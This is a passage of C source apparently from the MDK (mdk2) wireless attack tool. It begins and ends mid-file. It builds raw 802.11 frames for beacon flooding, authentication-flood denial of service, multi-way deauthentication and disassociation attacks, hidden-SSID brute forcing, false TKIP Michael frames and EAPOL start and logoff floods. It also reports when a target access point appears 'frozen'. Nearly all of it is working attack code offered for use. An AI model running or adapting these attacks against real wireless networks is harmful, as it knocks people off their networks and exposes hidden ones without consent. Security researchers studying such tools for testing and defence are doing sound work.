    printf("Waiting for beacon frame from victim...\n");

    while (1) {
	len = read_packet(pkt_sniff, 4096);
	if (len < 22) continue;
	if (! memcmp(pkt_sniff, "\x80", 1)) {
	    if (! memcmp(target, pkt_sniff+16, 6)) break;
	}
    }

//Find SSID tag in frame
    if (pkt_sniff[36] != '\x00') {
	printf("\nUNPARSABLE BEACON FRAME!\n");
	exit_now = 1;
    }
    if (pkt_sniff[37] > 32) printf("\nWARNING: NON-STANDARD BEACON FRAME, SSID LENGTH > 32\n");

//Analyze tag, Check if matching 0x00
    if (pkt_sniff[37] == '\x00') {
	printf("\nFound SSID length 0, no information about real SSIDs length available.\n");
    } else {
	zero_ssid = (uchar *) malloc(pkt_sniff[37]);
	memset(zero_ssid, '\x00', pkt_sniff[37]);
	if (! memcmp(pkt_sniff+38, zero_ssid, pkt_sniff[37])) {
	    printf("\nSSID is hidden. SSID Length is: %d.\n", pkt_sniff[37]);
	} else {
	    pkt_sniff[38+pkt_sniff[37]] = '\x00';
	    printf("\nSSID does not seem to be hidden! Found: \"%s\"\n", pkt_sniff+38);
	    exit_now = 1;
	}
    }

//return SSID string in packet struct
    pkt_sniff[38+pkt_sniff[37]] = '\x00';
    ssid.len = pkt_sniff[37];
    ssid.data = pkt_sniff+38;

    return ssid;
}

void ssid_brute_sniffer()
{
    printf("Sniffer thread started\n");
    int len=0;
    int i;
    int no_disp;
//infinite loop
    while (1) {
//sniff packet
	len = read_packet(pkt_check, 4096);
//is probe response?
	if (! memcmp(pkt_check, "\x50", 1)) {
//parse + print response
	    uchar *mac = pkt_check+16;
	    uchar slen = pkt_check[37];
	    pkt_check[38+slen] = '\x00';
	    no_disp = 0;
	    for (i=0; i<aps_known_count; i++) {
		if (!memcmp(aps_known[i], mac, 6)) no_disp = 1;
	    }
	    if (!exit_now && !no_disp) printf("\nGot response from %02X:%02X:%02X:%02X:%02X:%02X, SSID: \"%s\"\n", mac[0], mac[1], mac[2], mac[3], mac[4], mac[5], pkt_check+38);
	    if (!no_disp) {
		memcpy(aps_known[aps_known_count], mac, 6);
		aps_known_count++;
	    }
//If response is from target, exit mdk2
	    if (target != NULL) if (!memcmp(pkt_check+16, target, 6)) exit_now = 1;
	}
//loop
    }
}

/* Packet Generators */

struct pckt create_beacon_frame(char *ssid, int chan, int wep, int random_mac, int gmode, int adhoc, int advanced)
{
// Generate a beacon frame

    struct pckt retn;
    char *hdr =	"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00"
		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		"\x64\x00\x05\x00\x00";

    char param1[12];
    int modelen;
    struct advap fakeap;

    if (advanced) fakeap = get_fakeap_from_file();

    if(gmode) {
	//1-54 Mbit
	memcpy(&param1, "\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c\x03\x01", 12);
	modelen = 12;
    }
    else {
	//1-11 Mbit
	memcpy(&param1, "\x01\x04\x82\x84\x8b\x96\x03\x01", 8);
	modelen = 8;
    }

    char *param2 = "\x04\x06\x01\x02\x00\x00\x00\x00\x05\x04\x00\x01\x00\x00";
    //WPA-TKIP Tag
    char *wpatkip = "\xDD\x18\x00\x50\xF2\x01\x01\x00\x00\x50\xF2\x02\x01\x00\x00\x50\xF2\x02\x01\x00\x00\x50\xF2\x02\x00\x00";
    //WPA-AES Tag
    char *wpaaes = "\xDD\x18\x00\x50\xF2\x01\x01\x00\x00\x50\xF2\x04\x01\x00\x00\x50\xF2\x04\x01\x00\x00\x50\xF2\x02\x00\x00";

    int slen;
    struct pckt mac;

    //Getting SSID from file if file mode is in use
    if (advanced) {
	ssid = fakeap.ssid;
    } else {
	if (!(ssid_file_name == NULL)) ssid = read_line_from_file();
    }
    //Need to generate SSID or is one given?
    if (ssid == NULL) ssid = generate_ssid();
    slen = strlen(ssid);
    //Checking SSID lenght
    if (slen>32 && showssidwarn1) {
	printf("\rWARNING! Sending non-standard SSID > 32 bytes\n");
	showssidwarn1 = 0;
    }
    if (slen>255) {
	if (showssidwarn2) {
	    printf("\rWARNING! Truncating overlenght SSID to 255 bytes!\n");
	    showssidwarn2 = 0;
	}
	slen = 255;
    }
    // Setting up header
    memcpy(pkt, hdr, 36);
    // Set mode and WEP bit if wanted
    if(adhoc) {
        if(wep) pkt[34]='\x12';
        else pkt[34]='\x02';
    }
    else {
        if(wep) pkt[34]='\x11';
        else pkt[34]='\x01';
    }
    // Set random mac
    if (advanced) {
	mac.data = fakeap.mac;
    } else {
	if (random_mac) mac = generate_mac(0);
	    else mac = generate_mac(2);
    }
    memcpy(pkt+10, mac.data, 6);
    memcpy(pkt+16, mac.data, 6);
    // Set SSID
    pkt[37] = (uchar) slen;
    memcpy(pkt+38, ssid, slen);
    // Set Parameters 1
    memcpy(pkt+38+slen, param1, modelen);
    // Set Channel
    pkt[38+slen+modelen] = chan;
    // Set Parameters 2
    memcpy(pkt+39+slen+modelen, param2, 14);
    //Set WPA tag
    if(wep == 2) {	//If TKIP
        memcpy(pkt+53+slen+modelen, wpatkip, 26);
        modelen += 26;	//Let's just reuse the variable from 'gmode'.
    }
    else if(wep == 3) {	//If AES
        memcpy(pkt+53+slen+modelen, wpaaes, 26);
        modelen += 26;
   }

    retn.data = pkt;
    retn.len = slen+53+modelen;

    return retn;
}

struct pckt create_auth_frame(uchar *ap, int random_mac)
{
// Generating an authentication frame

    struct pckt retn;
    char *hdr = "\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00";
    struct pckt mac;

    memcpy(pkt, hdr, 31);
    // Set victim AP
    memcpy(pkt+4, ap, 6);
    memcpy(pkt+16,ap, 6);
    // Set random client MAC
    if (random_mac) mac = generate_mac(0);
	else mac = generate_mac(1);
    memcpy(pkt+10,mac.data,6);

    retn.len = 30;
    retn.data = pkt;

    return retn;
}

struct pckt create_probe_frame(char *ssid, struct pckt mac)
{
// Generating Probe Frame

    struct pckt retn;
    char *hdr = "\x40\x00\x00\x00\xff\xff\xff\xff\xff\xff";
    char *bcast = "\xff\xff\xff\xff\xff\xff";
    char *seq = "\x00\x00\x00";
    char *rates = "\x01\x04\x82\x84\x8b\x96";
    int slen;

    slen = strlen(ssid);

    memcpy(pkt, hdr, 10);
    // MAC which is probing
    memcpy(pkt+10, mac.data, 6);
    // Destination: Broadcast
    memcpy(pkt+16, bcast, 6);
    // Sequence
    memcpy(pkt+22, seq, 3);
    // SSID
    pkt[25] = slen;
    memcpy(pkt+26, ssid, slen);
    // Supported Bitrates (1, 2, 5.5, 11 MBit)
    memcpy(pkt+26+slen, rates, 6);

    retn.data = pkt;
    retn.len = 26 + slen + 6;

    return retn;
}

struct pckt create_deauth_frame(uchar *mac_sa, uchar *mac_da, uchar *mac_bssid, int disassoc)
{
// Generating deauthentication or disassociation frame

    struct pckt retn;           //DEST              //SRC
    char *hdr = "\xc0\x00\x3a\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		 //BSSID             //SEQ  //Reason:unspec
		"\x00\x00\x00\x00\x00\x00\x70\x6a\x01\x00";

    memcpy(pkt, hdr, 25);
    if (disassoc) pkt[0] = '\xa0';
    // Set victim Dest, Src, BSSID
    memcpy(pkt+4, mac_da, 6);
    memcpy(pkt+10,mac_sa, 6);
    memcpy(pkt+16,mac_bssid, 6);

    retn.len = 26;
    retn.data = pkt;

    return retn;
}

struct pckt amok_machine(int reset)
{
    // FSM for multi-way deauth-attack
    if (reset) state = 0;

    switch (state) {
	case 0:
	    newone:
	    pkt_amok = get_victim_deauth();
	    if (pkt_amok[1] & '\x01') {		// ToDS packet
		mac_ta = pkt_amok + 4;
		mac_sa = pkt_amok + 10;
		wds = 0;
	    }
	    if (pkt_amok[1] & '\x02') {		// FromDS packet
		mac_sa = pkt_amok + 4;
		mac_ta = pkt_amok + 10;
		wds = 0;
	    }
	    if ((pkt_amok[1] & '\x01') && (pkt_amok[1] & '\x02')) {	// WDS packet
		mac_sa = pkt_amok + 4;
		mac_ta = pkt_amok + 10;
		wds = 1;
	    }
	    if (is_whitelisted(mac_ta)) goto newone;
	    if (is_whitelisted(mac_sa)) goto newone;
	    state = 1;
	    return create_deauth_frame(mac_ta, mac_sa, mac_ta, 1);
	case 1:
	    state = 2;
	    if (wds) state = 4;
	    return create_deauth_frame(mac_ta, mac_sa, mac_ta, 0);
	case 2:
	    state = 3;
	    return create_deauth_frame(mac_sa, mac_ta, mac_ta, 1);
	case 3:
	    state = 0;
	    return create_deauth_frame(mac_sa, mac_ta, mac_ta, 0);
	case 4:
	    state = 5;
	    return create_deauth_frame(mac_sa, mac_ta, mac_sa, 1);
	case 5:
	    state = 0;
	    return create_deauth_frame(mac_sa, mac_ta, mac_sa, 0);
	}

    // We can never reach this part of code unless somebody messes around with memory
    // But just to make gcc NOT complain...
    return create_deauth_frame(mac_sa, mac_ta, mac_sa, 0);
}

struct pckt ssid_brute(int reset)
{
    struct pckt pkt;
    pthread_t sniffer;
    char *ssid;

    if (state == 0) {
//state0
//- SPAWN Sniffer thread
	pthread_create( &sniffer, NULL, (void *) ssid_brute_sniffer, (void *) 1);
//- sniff beacon frame from victim / do nothin if target==NULL
	if (target != NULL) {
	    pkt = get_victim_ssid();
//- set lenght variable
	    ssid_len = pkt.len;
//- set state1
	    state = 1;
//-> return probe packet using the SSID supplied by beacon frame
	    return create_probe_frame((char *)pkt.data, generate_mac(1));
	}
//- In untargetted mode, continue
	state = 1;
    }

    if (state == 1) {
//state1
	newssid:
//- read SSID from file
	ssid = read_line_from_file();
//- if lenght!=0, continue to next one if length does not match
	if (ssid_len != 0) if (ssid_len != strlen(ssid)) goto newssid;
//- Stop work if EOF is reached
	if (ssid_eof) {
	    printf("\nEnd of SSID list reached.\n");
	    exit_now = 1;
	}
//-> return packet containing SSID
	return create_probe_frame(ssid, generate_mac(1));
    }

    return pkt;
}

struct pckt ssid_brute_real(int reset)
{
    struct pckt pkt;
    pthread_t sniffer;
    char *ssid;

    if (state == 0) {
//state0
//- SPAWN Sniffer thread
	pthread_create( &sniffer, NULL, (void *) ssid_brute_sniffer, (void *) 1);
//- sniff beacon frame from victim / do nothin if target==NULL
	if (target != NULL) {
	    pkt = get_victim_ssid();
//- set lenght variable
	    ssid_len = pkt.len;
//- set state1
	    state = 1;
//-> return probe packet using the SSID supplied by beacon frame
	    return create_probe_frame((char *)pkt.data, generate_mac(1));
	}
//- In untargetted mode, continue
	state = 1;
    }

    if (state == 1) {
//state1
//- get SSID to probe for
	bruteforce_ssid();
	ssid = brute_ssid;
//- Stop work if last SSID is generated and sent
	if (end) {
	    if (max_permutations) printf("\nall %d possible SSIDs sent.\n", turns-1);
	    else printf("\nall %d possible SSIDs sent.\n", max_permutations);
	    exit_now = 1;
	}
//-> return packet containing SSID
	return create_probe_frame(ssid, generate_mac(1));
    }

    return pkt;

}

struct pckt false_tkip(uchar *target)
{
    struct pckt michael, src;
    int length, i;

    // length = (rand() % 246) + 20;
    length = 32;
    src = generate_mac(0);

    src.data[0] = 0x00;

    michael.len = length + 32;
    michael.data = (uchar*) malloc(michael.len);
    memcpy(michael.data, MICHAEL, 32);
    memcpy(michael.data+4, target, 6);
    memcpy(michael.data+10, src.data, 6);
    memcpy(michael.data+16, target, 6);

    //random extended IV
    michael.data[24] = rand() & 0xFF;
    michael.data[25] = rand() & 0xFF;
    michael.data[26] = rand() & 0xFF;

    //random data
    for(i=0; i<length; i++) {
        michael.data[i+32] = rand() & 0xFF;
    }

    return michael;
}

struct pckt create_assoc_frame(uchar *ssid, int ssid_len, uchar *ap, uchar *sta, int auth_flag, int ucast_flag, int mcast_flag)
{
  struct pckt retn;
  int ofs = 0;
  char *hdr = "\x00\x00\x3a\x01"     // type, fc, duration
	"\x00\x00\x00\x00\x00\x00"   // da
	"\x00\x00\x00\x00\x00\x00"   // sa
	"\x00\x00\x00\x00\x00\x00"   // bssid
	"\x00\xa6"                   // frag, seq
	"\x31\x05\x0a\x00"           // caps
	"\x00";                      // ssid tag

  memcpy(pkt, hdr, 29);
  memcpy(pkt + 4, ap, 6);            // set AP
  memcpy(pkt + 10, sta, 6);          // set STA
  memcpy(pkt + 16, ap, 6);           // set BSSID
  pkt[29] = ssid_len;                // set SSID len
  memcpy(pkt + 30, ssid, ssid_len);  // set SSID
  ofs = 30 + ssid_len;
  memcpy(pkt + ofs, SUPP_RATES, 10); // set supported rates
  ofs += 10;
  memcpy(pkt + ofs, EXT_RATES, 6);   // set extended rates
  ofs += 6;

  if (auth_flag == FLAG_AUTH_WPA) {
    pkt[ofs] = 0xdd;                 // set VSA id
    pkt[ofs + 1] = 22;               // set len
    ofs += 2;
    memcpy(pkt + ofs, IE_WPA, 6);    // set WPA IE
    ofs += 6;

    // set multicast cipher stuff
    switch (mcast_flag) {
      case FLAG_TKIP:
        memcpy(pkt + ofs, IE_WPA_TKIP, 4);
        break;
      case FLAG_CCMP:
        memcpy(pkt + ofs, IE_WPA_CCMP, 4);
        break;
    }

    // set number of unicast ciphers (1)
    pkt[ofs + 4] = 0x01;
    pkt[ofs + 5] = 0x00;
    ofs += 6;

    // set unicast cipher stuff
    switch (ucast_flag) {
      case FLAG_TKIP:
        memcpy(pkt + ofs, IE_WPA_TKIP, 4);
        break;
      case FLAG_CCMP:
        memcpy(pkt + ofs, IE_WPA_CCMP, 4);
        break;
    }

    // set number of auth key management suites (1)
    pkt[ofs + 4] = 0x01;
    pkt[ofs + 5] = 0x00;
    ofs += 6;
    memcpy(pkt + ofs, IE_WPA_KEY_MGMT, 4);
    ofs += 4;

  } // FLAG_AUTH_WPA


  if (auth_flag == FLAG_AUTH_RSN) {
    memcpy(pkt + ofs, IE_RSN, 4);    // set RSN IE
    ofs += 4;

    // set multicast cipher stuff
    switch (mcast_flag) {
      case FLAG_TKIP:
        memcpy(pkt + ofs, IE_RSN_TKIP, 4);
        break;
      case FLAG_CCMP:
        memcpy(pkt + ofs, IE_RSN_CCMP, 4);
        break;
    }

    // set number of unicast ciphers (1)
    pkt[ofs + 4] = 0x01;
    pkt[ofs + 5] = 0x00;
    ofs += 6;

    // set unicast cipher stuff
    switch (ucast_flag) {
      case FLAG_TKIP:
        memcpy(pkt + ofs, IE_RSN_TKIP, 4);
        break;
      case FLAG_CCMP:
        memcpy(pkt + ofs, IE_RSN_CCMP, 4);
        break;
    }

    // set number of auth key management suites (1)
    pkt[ofs + 4] = 0x01;
    pkt[ofs + 5] = 0x00;
    ofs += 6;
    memcpy(pkt + ofs, IE_RSN_KEY_MGMT, 4);
    ofs += 4;

  } // FLAG_AUTH_RSN

  retn.len = ofs;
  retn.data = pkt;

  return retn;
}

struct pckt eapol_machine(char *ssid, int ssid_len, uchar *target, int flag_wtype, int flag_ucast, int flag_mcast)
{
  struct pckt retn;
  int co, flag, len;
  int wait_max_frames = 50;

retry:

  // FSM: auth => assoc => eapol start flood

  switch (eapol_state) {

    // assoc
    case 0:
      // create a random auth frame
      retn = create_auth_frame(target, 0);
      // save STA MAC for later purposes
      memcpy(eapol_src, retn.data + 10, 6);
      eapol_state = 1;
      return retn;

    // auth
    case 1:
      // wait for answer from AP (authentication frame)
      co = 0;
      flag = 0;
      while (1) {
        co++;
        if (co > wait_max_frames) break;
        len = read_packet(pkt_sniff, 4096);
        if (pkt_sniff[0] == 0xb0) {
          printf("\ngot authentication frame: ");
          if (! memcmp(target, pkt_sniff + 10, 6) && (pkt_sniff[28] == 0x00)) {
            printf("authentication was successful\n");
            flag = 1;
            break;
          } else printf("from wrong AP or failed authentication!\n");
	}
      }  // while

      if (flag) {
        eapol_state = 2;
        return create_assoc_frame((uchar *) ssid, ssid_len, target, eapol_src, flag_wtype, flag_ucast, flag_mcast);
      } else {
        eapol_state = 0;
        goto retry;
      }
      break;

    // EAPOL Start
    case 2:
      co = 0;
      flag = 0;
      // wait for association response frame
      while (1) {
        co++;
        if (co > wait_max_frames) break;
        len = read_packet(pkt_sniff, 4096);
        if (pkt_sniff[0] == 0x10) {
          printf("got association response frame: ");
          if (! memcmp(target, pkt_sniff + 10, 6) && (pkt_sniff[26] == 0x00) ) {
            printf("association was successful\n");
            flag = 1;
            break;
          } else printf("from wrong AP or failed association!\n");
	}
      }  // while

      if (flag) {
        eapol_state = 3;
        goto retry;
      } else {
        // retry auth and assoc
        eapol_state = 0;
        goto retry;
      }
      break;

    case 3:
      memcpy(pkt, PKT_EAPOL_START, 36);
      memcpy(pkt + 4, target, 6);
      memcpy(pkt + 10, eapol_src, 6);
      memcpy(pkt + 16, target, 6);
      retn.len = 36;
      retn.data = pkt;
      return retn;
    }

    // We can never reach this part of code unless somebody messes around with memory
    // But just to make gcc NOT complain...
    return retn;
}

struct pckt eapol_logoff(uchar *ap, uchar *sta)
{
  struct pckt retn;

  memcpy(pkt, PKT_EAPOL_LOGOFF, 36);
  memcpy(pkt + 4, ap, 6);
  memcpy(pkt + 10, sta, 6);
  memcpy(pkt + 16, ap, 6);
  retn.len = 36;
  retn.data = pkt;
  return retn;
}


/* Response Checkers */

int get_array_index(int array_len, uchar *ap)
{
// Get index of AP in auth checker array auth[]

    int t;

    for(t=0; t<array_len; t++)
    {
	if (! memcmp(auth[t], ap, 6)) return t;
    }

    return -1;
}

void check_auth(uchar *ap)
{
// Checking if Authentication DoS Attack is successful

    int len = 0;
    int t, pos, resp = 0;

    for (t=0; t<5; t++) 
    {
	len = 0;
	while (len < 22) len = read_packet(pkt_check, 4096);
	// Is this frame from the victim?
	if (! memcmp(ap, pkt_check+16, 6))
	{
	    // Is this frame an auth response?
	    if (! memcmp(pkt_check, "\xb0", 1))
	    {
		resp = 1;
		goto exiting;  //Hehe, goto forever! ;)
	    }
	}
    }

    exiting:

    pos = get_array_index(auth_count, ap);
    if (pos == -1)  // This ap isn't in our array, so we make a new entry for it
    {
	memcpy (auth[auth_count], ap, 6); //Copy MAC into array
	auths[auth_count][0] = 0;	  //Set Status Flag 0
	auths[auth_count][1] = 0;	  //Init nr of responses
	auths[auth_count][2] = 0;	  //Init nr of missing responses
	pos = auth_count;                 //Set array position
	auth_count++;
    }

    // So far we have the MAC, know if the AP responded and its position in the array.
    // Checking Status and printf if anything important happened

    int status = auths[pos][0];  // Reading status out of array

    if (status == 0) //Nothing heard from AP so far
    {
	if (resp) //AP responding for the first time
	{
	    auths[pos][0] = 1; //Status 1 = responding
	    auths[pos][1]++;
	    printf("\rAP %02X:%02X:%02X:%02X:%02X:%02X is responding on attack!           \n", ap[0], ap[1], ap[2], ap[3], ap[4], ap[5]);
	}
	return;
    }
    if (status == 1) //Ap is known to respond
    {
	if (resp) //Ap keeps responding
	{
	    auths[pos][1]++;
	    if ((auths[pos][1] % 500 == 0) && (auths[pos][1] != 0)) //AP can handle huge amount of clients, possibly invulnerable
	    {
		printf("\rAP %02X:%02X:%02X:%02X:%02X:%02X seems to be INVULNERABLE!      \n", ap[0], ap[1], ap[2], ap[3], ap[4], ap[5]);
		printf("Device is still responding with %5d clients connected!\n", auths[pos][1]);
	    }
	} else { //MISSING RESPONSE!
	    auths[pos][0] = 2; //Status: Possible candidate for successful attack
	    auths[pos][2]++;   //Increase counter for missing response
	}
	return;
    }
    if (status == 2) //Ap stopped responding
    {
	if (resp) //False alarm, AP responding again
	{
	    auths[pos][0] = 1; //Reset Status
	    auths[pos][1]++;   //Add another response
	    auths[pos][2] = 0; //Reset missing response counter
	} else {
	    auths[pos][2]++;   //Increase missing response count
	    if (auths[pos][2] > 50) //50 responses missing => Another one bites the dust!
	    {
		auths[pos][0] = 3; //Status: attack successful
		printf("\rAP %02X:%02X:%02X:%02X:%02X:%02X seems to be SUCCESSFULLY ATTACKED and frozen!\n", ap[0], ap[1], ap[2], ap[3], ap[4], ap[5]);
		printf("Needed to connect %4d clients to freeze it.\n", auths[pos][1]);
		if (auths[pos][1] < 150) printf("This is an unexpected low value, AP could still be working but is out of range.\n");
	    }
	}
	return;
    }
    if (status == 3) //AP attacked
    {
	if (resp) //AP is back in action!
	{
	    auths[pos][0] = 1; //Reset Status
	    auths[pos][1] = 0;
	    auths[pos][2] = 0;
	    printf("\rAP %02X:%02X:%02X:%02X:%02X:%02X has returned to functionality!     \n", ap[0], ap[1], ap[2], ap[3], ap[4], ap[5]);
	}
	return;
    }
}

int check_probe(char *ssid, struct pckt mac)
{
// USING MODIFIED CODE FROM CHECK_AUTH, perhaps move into function to use by both

    int len = 0;
    int t, resp = 0;

    for (t=0; t<3; t++) 
    {
	len = 0;
	len = read_packet(pkt_check, 4096);
	// Is this frame for fake probing station?
	if (! memcmp(mac.data, pkt_check+4, 6))
	{
	    // Is this frame a probe response?
	    if (! memcmp(pkt_check, "\x50", 1))
	    {
		resp = 1;
		goto exiting;  //Again, goto forever! ;)
	    }
	}
    }

    exiting:
    return resp;
}

/* Statistics Printing */

void print_beacon_stats(struct pckt beacon)
{
// Print some information in beacon flood mode

    uchar *ssid = beacon.data+38;
    uchar len = beacon.data[37];
    uchar chan;

//Is there a 54 MBit speed byte?
    if(memcmp(&beacon.data[47+len], "\x6c", 1) == 0) {
        //There is! We need to skip 4 more bytes ahead to get to the channel byte
        memcpy(&chan, &beacon.data[50+len], 1);
    }
    else {
        memcpy(&chan, &beacon.data[46+len], 1);
   }

    uchar *mac = beacon.data+10;

//Removed '+1' since it always added a strange extra character to the output (?).
    ssid[len]='\x00';  // NOT GOOD! writes in original frame. Till now no copy was required. So this works

    printf("\rCurrent MAC: %02X:%02X:%02X:%02X:%02X:%02X", mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
    printf(" on Channel %2d with SSID: %s\n", chan, ssid);
}

void print_auth_stats(struct pckt authpkt)
{
// Print some information while in Authentication DoS mode

    uchar *ap = authpkt.data+4;
    uchar *fc = authpkt.data+10;

    printf("\rConnecting Client: %02X:%02X:%02X:%02X:%02X:%02X", fc[0], fc[1], fc[2], fc[3], fc[4], fc[5]);
    printf(" to victim AP: %02X:%02X:%02X:%02X:%02X:%02X\n", ap[0], ap[1], ap[2], ap[3], ap[4], ap[5]);
}

void print_probe_stats(int responses, int sent)
{
    int perc;

    perc = ((responses * 100) / sent);

    printf("\rAP responded on %d of %d probes (%d percent)                  \n", responses, sent, perc);
}

void print_deauth_stats(struct pckt packet)
{
// Print some information while in Deauthentication DoS mode

    uchar *ap = packet.data+16;
    uchar *fc = packet.data+4;  //For the case AP kicks client

    //For the case client deauthing from AP
    if (! memcmp(packet.data+4, packet.data+16, 6)) fc = packet.data + 10;

    printf("\rDisconnecting between: %02X:%02X:%02X:%02X:%02X:%02X", fc[0], fc[1], fc[2], fc[3], fc[4], fc[5]);
    printf(" and: %02X:%02X:%02X:%02X:%02X:%02X\n", ap[0], ap[1], ap[2], ap[3], ap[4], ap[5]);

}

void print_ssid_brute_stats(struct pckt packet, int sent)
{
    uchar *ssid = packet.data+26;
    packet.data[26+packet.data[25]] = '\x00';

    printf("\rTrying SSID: %s                                \n", ssid);
}

void print_stats(char mode, struct pckt packet, int responses, int sent)
{
// Statistics dispatcher

    switch (mode)
    {
    case 'b':
    case 'B':
	print_beacon_stats(packet);
	break;
    case 'a':
    case 'A':
	print_auth_stats(packet);
	break;
    case 'p':
	print_probe_stats(responses, sent);
	break;
    case 'd':
	print_deauth_stats(packet);
	break;
    case 'P':
	print_ssid_brute_stats(packet, sent);
	break;
    /*TODO*/
    }
}

/* MDK Attack Parser, Setting up attack environment */

int mdk_attack_parser(int argc, char *argv[])
{

    int nb_sent = 0, nb_sent_ps = 0;  // Packet counters
    char mode = '0';              // Current mode
    uchar *ap = NULL;             // Pointer to victim APs MAC
    char check = 0;               // Flag for checking if attack is successful
    struct pckt frm;              // Struct to save generated Packets
    char *ssid = NULL;            // Pointer to generated SSID
    int pps = 50;                 // Packet sending rate
    int t = 0;
    time_t t_prev;                // Struct to save time for printing stats every sec
    int total_time = 0;           // Amount of seconds the attack took till now
    int chan = 1;                 // Channel for beacon flood mode
    int fchan = 0;                // Channel selected via -c option
    int wep = 0;                  // WEP bit for beacon flood mode (1=WEP, 2=WPA-TKIP 3=WPA-AES)
    int gmode = 0;                // 54g speed flag
    struct pckt mac;              // MAC Space for probe mode
    int resps = 0;                // Counting responses for probe mode
    int usespeed = 0;             // Should attack be slown down?
    int random_mac = 1;           // Use random or valid MAC?
    int ppb = 70;                 // Number of packets per burst
    int wait = 10;                // Seconds to wait between bursts
    int adhoc = 0;                // Ad-Hoc mode
    int adv = 0;                  // Use advanced FakeAP mode

    t_prev = (time_t) malloc(sizeof(t_prev));

    if ((argc < 3) || (strlen(argv[2]) != 1))
    {
	printf(use_head);
	return -1;
    }

    /* Parsing Options - Need to switch to optarg parser? */

    switch (argv[2][0])
    {
    case 'b':
	mode = 'b';
	usespeed = 1;
	for (t=3; t<argc; t++)
	{
	    if (! strcmp(argv[t], "-n")) if (argc > t+1) ssid = argv[t+1];
	    if (! strcmp(argv[t], "-f")) if (argc > t+1) {
		if (ssid_file_name == NULL) ssid_file_name = argv[t+1];
		else { printf(use_beac); return -1; }
	    }
	    if (! strcmp(argv[t], "-v")) if (argc > t+1) {
		if (ssid_file_name == NULL) { ssid_file_name = argv[t+1]; adv=1; }
		else { printf(use_beac); return -1; }
	    }
	    if (! strcmp(argv[t], "-s")) if (argc > t+1) pps = strtol(argv[t+1], (char **) NULL, 10);
	    if (! strcmp(argv[t], "-c")) if (argc > t+1) fchan = strtol(argv[t+1], (char **) NULL, 10);
	    if (! strcmp(argv[t], "-h")) mode = 'B';
	    if (! strcmp(argv[t], "-m")) random_mac = 0;
	    if (! strcmp(argv[t], "-w")) wep = 1;
	    if (! strcmp(argv[t], "-g")) gmode = 1;
	    if (! strcmp(argv[t], "-t")) wep = 2;
	    if (! strcmp(argv[t], "-a")) wep = 3;
	    if (! strcmp(argv[t], "-d")) adhoc = 1;
	}
	break;
    case 'a':
	mode = 'a';
	for (t=3; t<argc; t++)
	{
	    if (! strcmp(argv[t], "-a")) {
		if (! argc > t+1) { printf(use_auth); return -1; }
		ap = (uchar *) parse_mac(argv[t+1]);
		mode = 'A';
	    }
	    if (! strcmp(argv[t], "-c")) check = 1;
	    if (! strcmp(argv[t], "-m")) random_mac = 0;
	    if (! strcmp(argv[t], "-s")) if (argc > t+1) {
		pps = strtol(argv[t+1], (char **) NULL, 10);
		usespeed = 1;
	    }
	}
	break;
    case 'p':
	mode = 'p';
	for (t=3; t<argc; t++)
	{
	    if (! strcmp(argv[t], "-b"))
	    {
		if(argc<=7){
	   		printf("\nYou have to specify at least:\n \
			\r a channel (-c), a target-mac (-t) and a character-set:\n \
			\r all printable (a)\n \
			\r lower case (l)\n \
			\r upper case (u)\n \
			\r numbers (n)\n \
			\r lower and upper case (c)\n \
			\r lower and upper plus numbers (m)\n \
			\noptional:\n proceed with SSID (-p <SSID>)\n packets per second (-s)\n");
	   printf("\ne.g. : mdk2 ath0 p -b a -p SSID -c 2 -t 00:11:22:33:44:55 -s 1\n\n");
	   return -1;
        }
		real_brute = 1;
		mode = 'P';
		if (argc > t) brute_mode = argv[t+1][0];
		printf("\nSSID Bruteforce Mode activated!\n");
		brute_ssid = (char*) malloc (256 * sizeof(char));
		
		
	    }
	    if (!strcmp(argv[t], "-p")) {
		    brute_ssid = argv[t+1];
		    printf("\nproceed with: %s",brute_ssid );
		    brute_ssid[0]--;
		}
	    if (! strcmp(argv[t], "-c")){
                if (argc > t+1){ 
		    printf("\n\nchannel set to: %d", atoi(argv[t+1]));
		    set_channel(atoi(argv[t+1]));
		    }
            }
	    if (! strcmp(argv[t], "-e")) if (argc > t+1) ssid = argv[t+1];
	    if (! strcmp(argv[t], "-f")) if (argc > t+1) {
		ssid_file_name = argv[t+1];
		mode = 'P';
		printf("\nSSID Wordlist Mode activated!\n");
	    }
	    if (! strcmp(argv[t], "-t")) {
		if (! argc > t+1) { printf(use_prob); return -1; }
		target = (uchar *) parse_mac(argv[t+1]);
	    }
	    if (! strcmp(argv[t], "-s")) if (argc > t+1) {
		pps = strtol(argv[t+1], (char **) NULL, 10);
		usespeed = 1;
	    }
	}
    break;
    case 'd':
	mode = 'd';
	for (t=3; t<argc; t++)
	{
	    if (! strcmp(argv[t], "-s")) if (argc > t+1) {
		pps = strtol(argv[t+1], (char **) NULL, 10);
		usespeed = 1;
	    }
	    if (! strcmp(argv[t], "-w")) if (argc > t+1) {
		if (wblist != 0) { printf(use_deau); return -1; }
		load_whitelist(argv[t+1]);
		wblist = 1;
	    }
	    if (! strcmp(argv[t], "-b")) if (argc > t+1) {
		if (wblist != 0) { printf(use_deau); return -1; }
		load_whitelist(argv[t+1]);
		wblist = 2;
	    }
	}
    break;
    case 'm':
        mode = 'm';
        usespeed = 1;
        pps = 400;
	for (t=3; t<argc; t++)
	{
	    if (! strcmp(argv[t], "-t")) {
		if (! (argc > t+1)) { printf(use_mich); return -1; }
		target = (uchar *) parse_mac(argv[t+1]);
	    }
	    if (! strcmp(argv[t], "-n")) if (argc > t+1) {
		ppb = strtol(argv[t+1], (char **) NULL, 10);
	    }
	    if (! strcmp(argv[t], "-w")) if (argc > t+1) {
		wait = strtol(argv[t+1], (char **) NULL, 10);
	    }
	    if (! strcmp(argv[t], "-s")) if (argc > t+1) {
		pps = strtol(argv[t+1], (char **) NULL, 10);
		usespeed = 1;
	    }
	}
    break;
    case 'x':
	mode = 'x';
        if (argc < 4) { printf(use_eapo); return -1; }
        eapol_attack = strtol(argv[3], (char **) NULL, 10);
        usespeed = 1;
        pps = 400;
        eapol_wtype = FLAG_AUTH_WPA;
        eapol_ucast = FLAG_TKIP;
        eapol_mcast = FLAG_TKIP;
	for (t=4; t<argc; t = t + 2)
	{
